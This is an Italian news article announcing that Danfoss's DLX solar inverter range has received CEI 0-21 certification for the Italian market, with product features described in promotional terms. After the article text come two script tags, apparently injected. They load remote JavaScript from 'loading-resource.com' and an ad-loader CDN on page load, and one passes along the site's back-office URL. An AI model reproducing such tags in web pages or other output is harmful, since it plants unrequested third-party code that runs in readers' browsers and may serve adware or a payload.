1. Home
  2. Notizie e Mercato
  3. La nuova gamma di inverter Danfoss DLX pronta per il mercato italiano

La nuova gamma di inverter Danfoss DLX pronta per il mercato italiano

Energie rinnovabili di
5/5
votato da 1 persone
Danfoss Solar Inverters ha conseguito la Certificazione CEI 0-21 per la nuova gamma di inverter monofase DLX, da oggi disponibile anche per il mercato italiano


Compatibile con ogni tipo di modulo FV, il DLX offre un’efficienza massima del 97.3% in una soluzione di design user-friendly e tecnologia ConnectSmart™ integrata.

Dopo il lancio in Europa, pronti anche per l’Italia
Lo scorso autunno Danfoss Solar Inverters ha introdotto nei mercati europeo e statunitense la nuova gamma di inverter monofase Danfoss DLX, che, grazie alle grandi prestazioni e al design user-friendly, ha riscosso da subito un enorme successo tra gli installatori. Oggi Danfoss ha conseguito la Certificazione CEI 0-21per la gamma DLX, che è quindi pronta per essere introdotta anche nel mercato italiano.  

Quando il design incontra l’efficienza
Per chi chiede il meglio sia in termini di performance sia di design, il nuovo Danfoss DLX è la scelta perfetta. L’elevata efficienza, abbinata ad un eccellente inseguimento MPP, garantisce un rendimento notevole, anche in condizioni di reti instabili. Grazie all’isolamento galvanico, il DLX può essere utilizzato con tutte le tecnologie di celle fotovoltaiche, incluso il film sottile. La struttura robusta e la contenuta rumorosità permettono di installare l’inverter sia all’interno sia all’esterno dell’edificio.

Veloce da installare e semplice da usare
Con un peso tra 19 e 21 Kg, il DLX è progettato per essere maneggiato e montato con facilità. L’installazione è semplice: tutti i collegamenti sono accessibili da un pannello facile da rimuovere, mentre il display interattivo offre la scelta fra più lingue per una facile configurazione delle impostazioni nazionali.

Monitoraggio integrato e tecnologia ConnectSmart™
Il DLX si avvale di una soluzione completa per il monitoraggio integrata, senza la necessità di un software aggiuntivo. Per impianti di taglia più grande, un singolo inverter funge da hub per il monitoraggio, in modo da fornire un solo punto di accesso per controllare la produzione dell’impianto - in qualsiasi momento, on-site o da remoto.
La versione software introdotta nel mercato italiano include già l’integrazione dell’innovativa tecnologia ConnectSmart™, che permette di controllare i dati di produzione in tempo reale tramite smartphone o tablet con la Danfoss SolarApp, permettendo l’accesso ai dati 24/7, da qualsiasi parte nel mondo.


<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>